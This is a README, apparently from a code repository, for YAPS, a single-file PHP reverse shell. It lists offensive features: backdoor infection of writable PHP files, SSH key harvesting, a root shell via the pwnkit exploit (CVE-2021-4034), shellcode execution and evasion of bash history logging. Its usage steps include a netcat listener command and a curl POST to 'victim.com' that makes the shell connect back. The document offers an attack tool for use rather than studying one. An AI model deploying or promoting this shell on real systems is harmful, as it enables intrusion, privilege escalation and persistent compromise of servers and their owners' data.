YAPS - Yet Another PHP Shell
Yes, as the name reveals, this is yet another PHP reverse shell, one more among hundreds available out there, but with some advantages. It is a single PHP file containing all its functions and you can control it via a simple TCP listener (e.g. nc -lp 1337).
In the current version (1.5), its main functions support only linux systems, but i'm planning to make it work with Windows too.
It's currently in its first version and I haven't tested it much yet, and there are still many things I intend to do and improve for the next versions (it's not done yet!), so please let me know if you've found any bugs or have some suggestion for feature or improvement. =)
Features
- Single PHP file (no need to install packages, libs, or download tons of files)
- Works with netcat, ncat, socat, multi/handler, almost any listener
- Customizable password protection
- No logs in .bash_history
- Does some enumeration
- Network info (interfaces, iptables rules, active ports)
- User info
- List SUID and GUID files
- Search for SSH keys (public and private)
- List crontab
- List writable PHP files
- Auto download LinPEAS, LinEnum or Linux Exploit Suggester
- Write and run PHP code on remote host
- Spawn an interactive reverse shell
- Duplicate as many connections as you want
- Auto update
- Infect PHP files with backdoors
- Auto reverse root shell via pwnkit (CVE-2021-4034)
- [NEW] Send and execute shellcode
Cons
- Connection isn't encrypted (yet) (nc does not support SSL)
- Not fully interactive (although you can spawn an interactive shell with
!interactive)- CTRL+C breaks it; can't use arrows to navigate (unless you use
rlwrap nc -lp <ip> <port>)
- CTRL+C breaks it; can't use arrows to navigate (unless you use
Usage
- Set up a TCP listener;
- Set your IP and port. This can be done by:
- 2.1 Editing the variables at the start of the script;
- 2.2 Setting them via post request (
curl -x POST -d "x=ip:port" victim.com/yaps.php);
- Open yaps.php on browser, curl it or run via CLI;
- 3.1 You can set
yaps.php?soryaps.php?silentto supress the banner - 3.2 You can run via CLI with
php yaps.php ip port
- Hack!
Working commands
!help - Display the help menu!all-colors - Toggle all colors (compatible with colorless TTY)!color - Toggle PS1 color (locally only, no environment variable is changed)!duplicate - Spawn another YAPS connection!enum - Download LinPEAS and LinEnum to /tmp and get them ready to use!info - list informations about the target (the enumeration I mentioned above)!infect - Infect writable PHP files with backdoors!interactive - Spawn interactive reverse shells on other ports (works w/ sudo, su, mysql, etc.)!passwd - Password option (enable, disable, set, modify)!php - Write and run PHP on the remote host!pwnkit - Tries to exploit CVE-2021-4034 and spawn a root revere shell!shellcode - Send and run shellcode on the remote host!suggester - Download Linux Exploit Suggester to /tmp and get it ready to use
Screenshots
Click to expand screenshots section
Current commands:
Doing some recon:
Root reverse shell through CVE-2021-4034
Sending and running shellcode!
Spawning a interactive shell
Duplicating a YAPS session
Poisoning PHP files
Writing remote PHP code
Password protected shell
Changelog
v1.5 - 12/02/2022
- Added
!shellcodeto receive and run an arbitrary shellcode - Improved
duplicate()function (you can now a range of ports) - Changed function name from
stabilizetointeractive - Packed embeded codes to save space
- Fixed broken links
- Prepend "TERM=xterm" to all commands
- Minor improvements
v1.4 - 04/02/2022
- Added
!pwnkitto exploit CVE-2021-4034 and spawn a root reverse shell - Improved
verify_update()function - Minor improvements
v1.3.1 - 01/08/2021
- Bugs fixed
v1.3 - 28/07/2021
- Added
!infectto infect PHP files with backdoors - Changed
!stabilizepayload (bugs fixed)
v1.2.2 - 18/07/2021
- Changed 'update' function
- Changed 'connect' function
- Improved 'download' function
- Bugs fixed
v1.2.1 - 17/07/2021
- Bugs fixed
v1.2 - 17/07/2021
- Added
!duplicateto spawn another shell - Added update verification (
--update|-u) - Added CLI arguments (
--help|-h) - Added socket via arguments (
php yaps.php ip port) - Changed stabilize shell method (doesn't freeze anymore)
- Changed download method
- Changed connection method via POST (receives a single parameter)
v1.1 - 12/07/2021
- Added
!all-colorsto toggle terminal colors and work with colorless TTYs - Added
exitcommand to close socket (leave shell) - Changed payload in
!stabilizeto unset HISTSIZE and HISTFILE - Changed the method of obtaining CPU and meminfo in
!info
v1.0.1 - 08/07/2021
- Changed
[x,y,z]toarray(x,y,z)to improve compatibility with older PHP versions - Changed payload for interactive shell to work with PHP<5.4
Credits
Some ideas were inspired by this tools:
Linpeas
https://github.com/carlospolop/privilege-escalation-awesome-scripts-suite/tree/master/linPEAS
Linenum
https://github.com/rebootuser/LinEnum
Suggester
https://github.com/AonCyberLabs/Windows-Exploit-Suggester
Pentest Monkey
https://github.com/pentestmonkey/php-reverse-shell